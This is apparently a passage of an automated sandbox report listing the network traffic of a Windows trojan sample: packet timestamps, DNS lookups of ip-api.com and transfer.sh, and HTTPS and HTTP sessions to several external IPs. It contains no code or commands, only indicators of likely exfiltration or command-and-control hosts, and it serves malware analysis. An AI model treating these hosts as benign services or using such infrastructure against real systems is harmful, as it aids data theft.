                            May 14, 2023 04:50:04.648876905 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:50:04.648890018 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:50:04.648912907 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:50:04.648917913 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:50:04.648972988 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:50:04.648978949 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:50:04.648991108 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:50:04.649053097 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:50:04.649059057 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:50:04.649158001 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:50:04.649168968 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:50:04.649204969 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:50:04.649250984 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:50:04.855437994 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:50:04.855638027 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:50:05.299417973 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:50:05.299554110 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:50:06.127433062 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:50:06.127597094 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:50:07.791420937 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:50:07.791512012 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:50:11.279419899 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:50:11.280184031 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:50:14.621439934 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:50:14.621489048 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:50:14.621512890 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:50:14.621603966 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:50:14.621618986 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:50:14.621635914 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:50:14.621716976 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.305619001 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.305660009 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.305699110 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.305735111 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.305789948 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.305802107 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.305820942 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.305850983 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.305865049 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.305902958 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.305936098 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.305938005 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.305952072 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.305962086 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.305985928 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.306024075 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.306039095 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.306066036 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.306111097 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.306128025 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.306154966 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.306171894 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.320203066 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.331201077 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.331506968 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.331547022 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.331621885 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.331665993 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.331702948 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.331717014 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.331727982 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.331734896 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.331789970 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.331804037 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.331820011 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.331836939 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.331837893 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.331887960 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.331918001 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.331924915 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.331943989 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.331965923 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.331996918 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.332015991 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.332032919 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.332046986 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.332051039 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.332067013 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.332077026 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.332098007 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.332099915 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.332164049 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.332175970 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.332190990 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.332191944 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.332211018 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.332226992 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.332238913 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.332285881 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.332289934 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.332304955 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.332308054 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.332355976 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.332364082 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.332376957 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.332386971 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.332405090 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.332422018 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.332432985 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.332463026 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.332489967 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.332499981 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.332501888 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.332515001 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.332532883 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.332556009 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.332575083 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.332591057 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.332602978 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.332614899 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.332652092 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.332669020 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.332690954 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.332690954 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.332707882 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.332722902 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.332747936 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.332763910 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.332772970 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.332792997 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.332849979 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.332868099 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.348587036 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.353293896 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.353333950 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.353435040 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.353488922 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.353506088 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.353563070 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.353596926 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.353606939 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.353615046 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.353640079 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.353646040 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.353679895 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.353707075 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.353734970 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.353768110 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.353775978 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.353790998 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.353813887 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.353852034 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.353862047 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.353888988 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.353908062 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.353960991 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.353981972 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.354063034 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.354072094 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.354147911 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.354176998 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.354233980 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.354244947 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.354274035 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.354305983 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.354362965 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.354387999 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.354460955 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.354470015 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.354496956 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.354518890 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.354545116 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.354525089 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.354579926 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.354610920 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.354655027 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.354695082 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.354715109 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.354783058 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.354794025 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.354826927 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.354875088 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.354928017 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.354954004 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.355032921 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.355046034 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.355073929 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.355218887 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.355264902 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.355318069 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.355328083 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.355355024 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.355379105 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.355482101 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.355506897 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.355606079 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.355606079 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.355619907 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.356750965 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.378098965 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.378138065 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.378226042 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.378298044 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.378353119 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.378357887 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.378387928 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.378411055 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.378484964 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.378530979 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.378545046 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.378604889 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.378629923 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.378705025 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.378719091 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.378737926 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.378767967 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.378818989 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.378839970 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.378894091 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.378909111 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.378926039 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.378952980 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.379133940 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.379163027 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.379221916 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.379235029 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.379265070 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.379280090 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.379559040 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.379585981 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.379705906 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.379712105 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.379726887 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.379781961 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.379806042 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.379827023 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.379873037 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.379890919 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.379966021 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.379986048 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.380147934 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.380162001 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.380182981 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.380330086 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.380362988 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.380366087 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.380387068 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.380409002 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.380480051 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.380527020 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.380548000 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.380613089 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.380623102 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.380647898 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.380667925 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.400724888 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.400758028 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.400847912 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.400875092 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.400902033 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.400942087 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.401401997 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.401432991 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.401607990 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.401613951 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.401629925 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.401657104 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.401681900 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.401704073 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.401712894 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.401731014 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.401760101 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.401835918 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.401865005 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.401916027 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.401922941 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.401964903 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.402101040 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.402148008 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.402163982 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.402172089 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.402194977 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.402244091 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.402251959 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.402271032 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.402327061 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.402338028 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.402390957 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.402417898 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.402441025 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.441685915 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:08.418219090 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:08.418299913 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:15.817348957 CEST4971080192.168.2.3208.95.112.1
                            May 14, 2023 04:51:15.846571922 CEST8049710208.95.112.1192.168.2.3
                            May 14, 2023 04:51:15.846993923 CEST4971080192.168.2.3208.95.112.1
                            May 14, 2023 04:51:15.851380110 CEST4971080192.168.2.3208.95.112.1
                            May 14, 2023 04:51:15.889153004 CEST8049710208.95.112.1192.168.2.3
                            May 14, 2023 04:51:15.889318943 CEST4971080192.168.2.3208.95.112.1
                            May 14, 2023 04:51:15.943435907 CEST4971180192.168.2.3185.159.130.81
                            May 14, 2023 04:51:19.080379009 CEST4971180192.168.2.3185.159.130.81
                            May 14, 2023 04:51:20.964112043 CEST4970080192.168.2.3185.159.129.168
                            May 14, 2023 04:51:21.025439978 CEST8049700185.159.129.168192.168.2.3
                            May 14, 2023 04:51:25.124927044 CEST4971180192.168.2.3185.159.130.81
                            May 14, 2023 04:51:37.144164085 CEST4971280192.168.2.3185.159.129.168
                            May 14, 2023 04:51:37.206959963 CEST8049712185.159.129.168192.168.2.3
                            May 14, 2023 04:51:37.207097054 CEST4971280192.168.2.3185.159.129.168
                            May 14, 2023 04:51:37.208010912 CEST4971280192.168.2.3185.159.129.168
                            May 14, 2023 04:51:37.270049095 CEST8049712185.159.129.168192.168.2.3
                            May 14, 2023 04:51:37.270178080 CEST8049712185.159.129.168192.168.2.3
                            May 14, 2023 04:51:37.270306110 CEST4971280192.168.2.3185.159.129.168
                            May 14, 2023 04:51:37.292248964 CEST4971380192.168.2.3185.149.146.118
                            May 14, 2023 04:51:37.314754009 CEST8049713185.149.146.118192.168.2.3
                            May 14, 2023 04:51:37.314951897 CEST4971380192.168.2.3185.149.146.118
                            May 14, 2023 04:51:37.319658995 CEST4971380192.168.2.3185.149.146.118
                            May 14, 2023 04:51:37.342288017 CEST8049713185.149.146.118192.168.2.3
                            May 14, 2023 04:51:37.479145050 CEST8049713185.149.146.118192.168.2.3
                            May 14, 2023 04:51:37.479183912 CEST8049713185.149.146.118192.168.2.3
                            May 14, 2023 04:51:37.479301929 CEST4971380192.168.2.3185.149.146.118
                            May 14, 2023 04:51:37.479377985 CEST4971380192.168.2.3185.149.146.118
                            May 14, 2023 04:51:46.287863016 CEST4971080192.168.2.3208.95.112.1
                            May 14, 2023 04:51:46.287978888 CEST4971380192.168.2.3185.149.146.118
                            May 14, 2023 04:51:46.288016081 CEST4971280192.168.2.3185.159.129.168
                            May 14, 2023 04:52:11.359051943 CEST8049707144.76.136.153192.168.2.3
                            May 14, 2023 04:52:11.359196901 CEST4970780192.168.2.3144.76.136.153
                            May 14, 2023 04:52:16.802156925 CEST4971580192.168.2.3185.159.130.81
                            May 14, 2023 04:52:19.943517923 CEST4971580192.168.2.3185.159.130.81
                            May 14, 2023 04:52:25.944065094 CEST4971580192.168.2.3185.159.130.81
                            May 14, 2023 04:52:37.947556973 CEST4971680192.168.2.3185.159.129.168
                            May 14, 2023 04:52:38.010185957 CEST8049716185.159.129.168192.168.2.3
                            May 14, 2023 04:52:38.010314941 CEST4971680192.168.2.3185.159.129.168
                            May 14, 2023 04:52:38.010570049 CEST4971680192.168.2.3185.159.129.168
                            May 14, 2023 04:52:38.072807074 CEST8049716185.159.129.168192.168.2.3
                            May 14, 2023 04:52:38.220010996 CEST8049716185.159.129.168192.168.2.3
                            May 14, 2023 04:52:38.220056057 CEST8049716185.159.129.168192.168.2.3
                            May 14, 2023 04:52:38.220082045 CEST8049716185.159.129.168192.168.2.3
                            May 14, 2023 04:52:38.220141888 CEST4971680192.168.2.3185.159.129.168
                            May 14, 2023 04:52:38.220174074 CEST4971680192.168.2.3185.159.129.168
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            May 14, 2023 04:49:30.708652020 CEST | 59324 | 53 | 192.168.2.3 | 8.8.8.8
                            May 14, 2023 04:49:30.738018036 CEST | 53 | 59324 | 8.8.8.8 | 192.168.2.3
                            May 14, 2023 04:49:52.629153967 CEST | 57840 | 53 | 192.168.2.3 | 8.8.8.8
                            May 14, 2023 04:49:52.649363995 CEST | 53 | 57840 | 8.8.8.8 | 192.168.2.3
                            May 14, 2023 04:50:39.263525963 CEST | 52387 | 53 | 192.168.2.3 | 8.8.8.8
                            May 14, 2023 04:50:39.307296038 CEST | 53 | 52387 | 8.8.8.8 | 192.168.2.3
                            May 14, 2023 04:51:15.782203913 CEST | 60625 | 53 | 192.168.2.3 | 8.8.8.8
                            May 14, 2023 04:51:15.810194969 CEST | 53 | 60625 | 8.8.8.8 | 192.168.2.3
                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                            May 14, 2023 04:49:30.708652020 CEST | 192.168.2.3 | 8.8.8.8 | 0x30e0 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
                            May 14, 2023 04:49:52.629153967 CEST | 192.168.2.3 | 8.8.8.8 | 0x6ae2 | Standard query (0) | transfer.sh | A (IP address) | IN (0x0001) | false
                            May 14, 2023 04:50:39.263525963 CEST | 192.168.2.3 | 8.8.8.8 | 0x3184 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
                            May 14, 2023 04:51:15.782203913 CEST | 192.168.2.3 | 8.8.8.8 | 0x8b | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                            May 14, 2023 04:49:30.738018036 CEST | 8.8.8.8 | 192.168.2.3 | 0x30e0 | No error (0) | ip-api.com |  | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                            May 14, 2023 04:49:52.649363995 CEST | 8.8.8.8 | 192.168.2.3 | 0x6ae2 | No error (0) | transfer.sh |  | 144.76.136.153 | A (IP address) | IN (0x0001) | false
                            May 14, 2023 04:50:39.307296038 CEST | 8.8.8.8 | 192.168.2.3 | 0x3184 | No error (0) | ip-api.com |  | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                            May 14, 2023 04:51:15.810194969 CEST | 8.8.8.8 | 192.168.2.3 | 0x8b | No error (0) | ip-api.com |  | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                            • transfer.sh
                            • ip-api.com
                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            0 | 192.168.2.3 | 49702 | 144.76.136.153 | 443 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
                            Timestamp | kBytes transferred | Direction | Data


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            1 | 192.168.2.3 | 49708 | 144.76.136.153 | 443 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
